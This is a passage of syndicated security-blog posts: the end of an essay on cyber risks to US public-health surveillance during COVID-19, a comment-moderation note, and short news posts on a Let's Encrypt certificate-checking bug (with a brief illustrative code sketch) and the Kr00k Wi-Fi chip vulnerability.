Potential vulnerabilities in these systems are legion: hackers exploiting bugs in the software, unauthorized access to a lab’s servers by some other route, or interference with the digital communications between the labs and the CDC. That the software involved in disease tracking sometimes has access to electronic medical records is particularly concerning, because those records are often integrated into a clinic or hospital’s network of digital devices. One such device connected to a single hospital’s network could, in theory, be used to hack into the CDC’s entire COVID-19 database.

In practice, hacking deep into a hospital’s systems can be shockingly easy. As part of a cybersecurity study, Israeli researchers at Ben-Gurion University were able to hack into a hospital’s network via the public Wi-Fi system. Once inside, they could move through most of the hospital’s databases and diagnostic systems. Gaining control of the hospital’s unencrypted image database, the researchers inserted malware that altered healthy patients’ CT scans to show nonexistent tumors. Radiologists reading these images could only distinguish real from altered CTs 60 percent of the time­ — and only after being alerted that some of the CTs had been manipulated.

Another study directly relevant to public-health emergencies showed that a critical US biosecurity initiative, the Department of Homeland Security’s BioWatch program, had been left vulnerable to cyberattackers for over a decade. This program monitors more than 30 US jurisdictions and allows health officials to rapidly detect a bioweapons attack. Hacking this program could cover up an attack, or fool authorities into believing one has occurred.

Fortunately, no case of healthcare sabotage by intelligence agencies or hackers has come to light (the closest has been a series of ransomware attacks extorting money from hospitals, causing significant data breaches and interruptions in medical services). But other critical infrastructure has often been a target. The Russians have repeatedly hacked Ukraine’s national power grid, and have been probing US power plants and grid infrastructure as well. The United States and Israel hacked the Iranian nuclear program, while Iran has targeted Saudi Arabia’s oil infrastructure. There is no reason to believe that public-health infrastructure is in any way off limits.

Despite these precedents and proven risks, a detailed assessment of the vulnerability of US health surveillance systems to infiltration and manipulation has yet to be made. With COVID-19 on the verge of becoming a pandemic, the United States is at risk of not having trustworthy data, which in turn could cripple our country’s ability to respond.

Under normal conditions, there is plenty of time for health officials to notice unusual patterns in the data and track down wrong information — if necessary, using the old-fashioned method of giving the lab a call. But during an epidemic, when there are tens of thousands of cases to track and analyze, it would be easy for exhausted disease experts and public-health officials to be misled by corrupted data. The resulting confusion could lead to misdirected resources, give false reassurance that case numbers are falling, or waste precious time as decision makers try to validate inconsistent data.

In the face of a possible global pandemic, US and international public-health leaders must lose no time assessing and strengthening the security of the country’s digital health systems. They also have an important role to play in the broader debate over cybersecurity. Making America’s health infrastructure safe requires a fundamental reorientation of cybersecurity away from offense and toward defense. The position of many governments, including the United States’, that Internet infrastructure must be kept vulnerable so they can better spy on others, is no longer tenable. A digital arms race, in which more countries acquire ever more sophisticated cyberattack capabilities, only increases US vulnerability in critical areas such as pandemic control. By highlighting the importance of protecting digital health infrastructure, public-health leaders can and should call for a well-defended and peaceful Internet as a foundation for a healthy and secure world.

This essay was co-authored with Margaret Bourdeaux; a slightly different version appeared in Foreign Policy.

EDITED TO ADD: On last week’s squid post, there was a big conversation regarding COVID-19. Many of the comments straddled the line between what is and isn’t on topic. Yesterday I deleted a bunch for being off-topic. Then I reconsidered and republished some of what I deleted.

Going forward, comments about COVID-19 will be restricted to the security and risk implications of the virus. This includes cybersecurity, security, risk management, surveillance, and containment measures. Comments that stray off those topics will be removed. By clarifying this, I hope to keep the conversation on-topic while also allowing discussion of the security implications of current events.

Thank you for your patience and forbearance on this.

Let’s Encrypt Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/03/lets_encrypt_vu.html

The BBC is reporting a vulnerability in the Let’s Encrypt certificate service:

In a notification email to its clients, the organisation said: “We recently discovered a bug in the Let’s Encrypt certificate authority code.

“Unfortunately, this means we need to revoke the certificates that were affected by this bug, which includes one or more of your certificates. To avoid disruption, you’ll need to renew and replace your affected certificate(s) by Wednesday, March 4, 2020. We sincerely apologise for the issue.”

I am seeing nothing on the Let’s Encrypt website. And no other details anywhere. I’ll post more when I know more.

EDITED TO ADD: More from Ars Technica:

Let’s Encrypt uses Certificate Authority software called Boulder. Typically, a Web server that services many separate domain names and uses Let’s Encrypt to secure them receives a single LE certificate that covers all domain names used by the server rather than a separate cert for each individual domain.

The bug LE discovered is that, rather than checking each domain name separately for valid CAA records authorizing that domain to be renewed by that server, Boulder would check a single one of the domains on that server n times (where n is the number of LE-serviced domains on that server). Let’s Encrypt typically considers domain validation results good for 30 days from the time of validation — but CAA records specifically must be checked no more than eight hours prior to certificate issuance.

The upshot is that a 30-day window is presented in which certificates might be issued to a particular Web server by Let’s Encrypt despite the presence of CAA records in DNS that would prohibit that issuance.

Since Let’s Encrypt finds itself in the unenviable position of possibly having issued certificates that it should not have, it is revoking all current certificates that might not have had proper CAA record checking on Wednesday, March 4. Users whose certificates are scheduled to be revoked will need to manually force a renewal before then.
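
To make the bug class concrete, here is a Python sketch of the flaw as described (not Boulder’s actual code, which is written in Go): one domain gets rechecked n times instead of each of the n domains once.

def check_caa(domain):
    print(f"CAA lookup for {domain}")

domains = ["a.example", "b.example", "c.example"]

# Buggy: the loop ignores its variable and rechecks the first domain n times.
for _ in domains:
    check_caa(domains[0])

# Fixed: every domain on the certificate gets its own fresh CAA check.
for domain in domains:
    check_caa(domain)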

And Let’s Encrypt has a blog post about it.

Wi-Fi Chip Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2020/03/wi-fi_chip_vuln.html

There’s a vulnerability in Wi-Fi hardware that breaks the encryption:

The vulnerability exists in Wi-Fi chips made by Cypress Semiconductor and Broadcom, the latter a chipmaker Cypress acquired in 2016. The affected devices include iPhones, iPads, Macs, Amazon Echos and Kindles, Android devices, and Wi-Fi routers from Asus and Huawei, as well as the Raspberry Pi 3. Eset, the security company that discovered the vulnerability, said the flaw primarily affects Cypress’ and Broadcom’s FullMAC WLAN chips, which are used in billions of devices. Eset has named the vulnerability Kr00k, and it is tracked as CVE-2019-15126.

Manufacturers have made patches available for most or all of the affected devices, but it’s not clear how many devices have installed the patches. Of greatest concern are vulnerable wireless routers, which often go unpatched indefinitely.

That’s the real problem. Many of these devices won’t get patched — ever.